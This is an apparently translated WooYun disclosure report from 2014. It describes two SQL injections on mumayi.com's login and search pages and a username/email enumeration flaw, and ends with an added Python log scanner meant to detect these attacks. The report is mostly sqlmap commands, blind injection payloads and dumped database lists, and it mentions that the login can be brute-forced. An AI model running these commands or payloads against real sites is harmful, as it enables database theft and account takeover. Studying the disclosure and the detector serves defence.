
Vulnerability summary

Defect ID: wooyun-2014-087458

Title: Two SQL injections in Mumayi (木蚂蚁) and a separate username/email enumeration issue

Vendor: mumayi.com

Author: 玉林嘎

Submitted: 2014-12-17 09:36

Fixed: 2015-01-31 09:38

Disclosed: 2015-01-31 09:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-17: Details sent to the vendor, awaiting vendor processing
2014-12-17: Vendor confirmed; details disclosed to the vendor only
2014-12-27: Details disclosed to core white hats and domain experts
2015-01-06: Details disclosed to regular white hats
2015-01-16: Details disclosed to intern white hats
2015-01-31: Details disclosed to the public

Brief description:

Detailed description:

The previous holes have all been patched, but the problem is still there and is very similar.
http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code
The main login page has a POST injection:
sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep"

sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Place: POST
Parameter: usernm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: usernm=1') AND SLEEP(5) AND ('aGgE'='aGgE&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist[]=basicinfo&scopelist[]=bbsinfo&client_id=100003&response_type=code&redirect_uri=http://hao.mumayi.cn/Homelogin/Callback&state=&scope=&display=&accept=Yep
---
[23:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://u.mumayi.com/oauth/?m=Oauth&a=authorize" --data "usernm=1&passwd=c4ca4238a0b923820dcc509a6f75849b&scopelist%5B%5D=basicinfo&scopelist%5B%5D=bbsinfo&client_id=100003&response_type=code&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&state=&scope=&display=&accept=Yep" --dbs

available databases [9]:
[*] information_schema
[*] mumayipay_mumayi
[*] mysql
[*] oauth
[*] performance_schema
[*] test
[*] uc
[*] uc_mumayi
[*] ucenter


It still reaches the user database and other important databases.
The search site http://s.mumayi.com/index.php?q=1&typeid=0 is also injectable (via the q parameter):
sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: q
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND 2300=2300 AND '%'='&typeid=0
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: q=1%' AND SLEEP(5) AND '%'='&typeid=0
---
[22:39:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.21
back-end DBMS: MySQL 5.0.11


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --dbs

available databases [1]:
[*] developer


sqlmap -u "http://s.mumayi.com/index.php?q=1&typeid=0" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -D developer --table
Remember to include the tamper scripts.

[23:01:10] [INFO] retrieved: 
[23:01:11] [WARNING] reflective value(s) found and filtering out
98

Too many to list.
There is also one more small issue, which I mentioned last time:
http://u.mumayi.com/?a=retrievepass
On the password-retrieval page, all usernames and email addresses can be enumerated by UID.

[Screenshot: QQ图片20141217000834.jpg]


You can see it directly with "Inspect Element".
And the login has no captcha at all, so it is very easy to brute-force.
Submitting them together; hoping for a high rank.
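As an added defender-side example (not part of the report or of mumayi.com's code), the Python below scans constructed Nginx-style access-log lines for the two symptoms that are visible in a GET log: the report's own blind payloads in the search parameter q, and one client walking the retrievepass page UID by UID. The log lines are constructed, the parameter name uid is an assumption (the report only says "by UID"), and the POST injection in usernm is not covered because request bodies are not written to an access log.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Nginx "combined"-style lines, not real traffic. The two q payloads
# are the sqlmap payloads quoted in the report, URL-encoded; the retrievepass
# parameter name "uid" is an assumption (the report only says "by UID").
SAMPLE_LOG = """\
1.2.3.4 - - [17/Dec/2014:22:39:58 +0800] "GET /index.php?q=1%25%27%20AND%202300%3D2300%20AND%20%27%25%27%3D%27&typeid=0 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"
1.2.3.4 - - [17/Dec/2014:22:40:03 +0800] "GET /index.php?q=1%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27&typeid=0 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"
5.6.7.8 - - [17/Dec/2014:22:40:10 +0800] "GET /index.php?q=angry+birds+100%25&typeid=0 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
9.9.9.9 - - [17/Dec/2014:23:59:01 +0800] "GET /?a=retrievepass&uid=1001 HTTP/1.1" 200 300 "-" "python-requests/2.4"
9.9.9.9 - - [17/Dec/2014:23:59:02 +0800] "GET /?a=retrievepass&uid=1002 HTTP/1.1" 200 300 "-" "python-requests/2.4"
9.9.9.9 - - [17/Dec/2014:23:59:03 +0800] "GET /?a=retrievepass&uid=1003 HTTP/1.1" 200 300 "-" "python-requests/2.4"
5.6.7.8 - - [17/Dec/2014:23:59:30 +0800] "GET /?a=retrievepass&uid=77 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Coarse markers of the blind payloads above: a quote that closes the LIKE
# string followed by AND/OR, or a time-delay function call.
SQLI_RE = re.compile(r"'\s*(and|or)\b|\b(sleep|benchmark)\s*\(", re.I)

def parse_line(line):
    """Split one access-log line into (ip, method, path, query dict, status)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    parts = urlsplit(target)          # parse_qs also percent-decodes values
    return ip, method, parts.path, parse_qs(parts.query), status

def find_search_injection(log_text):
    """(ip, decoded q) for search requests whose q carries a blind-SQLi marker."""
    hits = []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ip, _, path, qs, _ = rec
        if path.endswith("/index.php"):
            hits += [(ip, q) for q in qs.get("q", []) if SQLI_RE.search(q)]
    return hits

def find_uid_enumeration(log_text, threshold=3):
    """{ip: distinct uids} for clients walking retrievepass UID by UID."""
    seen = defaultdict(set)
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ip, _, _, qs, _ = rec
        if qs.get("a") == ["retrievepass"]:
            seen[ip].update(qs.get("uid", []))
    return {ip: len(u) for ip, u in seen.items() if len(u) >= threshold}
```

The quote-plus-AND/OR marker is deliberately coarse and will flag a benign search containing an apostrophe followed by "and"; tune it against your own traffic before alerting on it.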

Proof of vulnerability: (same content as the detailed description above)


Fix recommendation:

Copyright notice: please credit the source when reposting: 玉林嘎@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-12-17 10:02

Vendor reply:

Thanks for the heads-up, we are working on it.

Latest status:

2015-01-06: